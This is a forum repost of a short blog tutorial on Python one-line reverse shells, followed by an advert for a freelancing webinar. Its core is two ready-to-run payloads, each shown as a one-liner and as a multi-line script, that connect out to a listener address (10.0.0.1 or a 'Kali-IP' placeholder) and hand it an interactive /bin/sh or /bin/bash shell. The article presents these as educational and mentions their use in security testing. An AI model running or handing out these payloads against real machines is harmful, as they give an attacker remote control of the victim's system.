[Tut] Python One Line Reverse Shell - Printable Version +- Sick Gaming (https://www.sickgaming.net) +-- Forum: Programming (https://www.sickgaming.net/forum-76.html) +--- Forum: Python (https://www.sickgaming.net/forum-83.html) +--- Thread: [Tut] Python One Line Reverse Shell (/thread-96476.html) |
[Tut] Python One Line Reverse Shell - xSicKxBot - 07-30-2020 Python One Line Reverse Shell <div><p>This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:</p> <h2>What is a Reverse Shell?</h2> <p>Here’s the definition of a Reverse Shell:</p> <p class="has-pale-cyan-blue-background-color has-background">A <strong>reverse shell</strong> is used by hackers to gain access to a target machine. The target machine opens a shell to communicate to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To accomplish a reverse shell, a hacker must execute code on a target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.</p> <p>You can read more <a href="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref" target="_blank" rel="noreferrer noopener" title="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref">here</a>. In this tutorial, you’ll learn how to create a reverse shell in one line Python.</p> <h2>Method 1</h2> <p>I found this code in a <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noreferrer noopener" title="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">blog </a>thread. You can run it from any computer with Python installed and visible from your current location:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</pre> <p>But you should never execute code that’s copy&pasted from an Internet source. What if the code removes all files from your computer?</p> <p>Let’s have a look at how this code looks like as a Python multi-liner so that you can understand it better:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import socket,subprocess,os s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) </pre> <p>As you see, the code opens a socket (which is an entry point for a connection), <a href="https://www.tutorialspoint.com/python/os_dup2.htm" target="_blank" rel="noreferrer noopener" title="https://www.tutorialspoint.com/python/os_dup2.htm">duplicates file descriptors</a>, and calling a <a href="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/" target="_blank" rel="noreferrer noopener" title="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/">Linux shell</a>. Thus, it will only run on Linux-based systems.</p> <h2>Method 2</h2> <p>In <a href="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7" target="_blank" rel="noreferrer noopener" title="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7">this</a> Github thread, I found another one-liner that opens a reverse shell:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'</pre> <p>When writing the equivalent multi-liner, the code looks more understandable:</p> <pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pty import socket,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("Kali-IP",443)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash") </pre> <p>It’s very similar to the above code but uses the <code>pty</code> library to create the shell. </p> <h2>Where to Go From Here?</h2> <p>Enough theory, let’s get some practice!</p> <p>To become successful in coding, you need to get out there and solve real problems for real people. That’s how you can become a six-figure earner easily. And that’s how you polish the skills you really need in practice. After all, what’s the use of learning theory that nobody ever needs?</p> <p><strong>Practice projects is how you sharpen your saw in coding!</strong></p> <p>Do you want to become a code master by focusing on practical code projects that actually earn you money and solve problems for people?</p> <p>Then become a Python freelance developer! It’s the best way of approaching the task of improving your Python skills—even if you are a complete beginner.</p> <p>Join my free webinar <a rel="noreferrer noopener" href="https://blog.finxter.com/webinar-freelancer/" target="_blank">“How to Build Your High-Income Skill Python”</a> and watch how I grew my coding business online and how you can, too—from the comfort of your own home.</p> <p><a href="https://blog.finxter.com/webinar-freelancer/" target="_blank" rel="noreferrer noopener">Join the free webinar now!</a></p></p> </div> https://www.sickgaming.net/blog/2020/07/30/python-one-line-reverse-shell/ |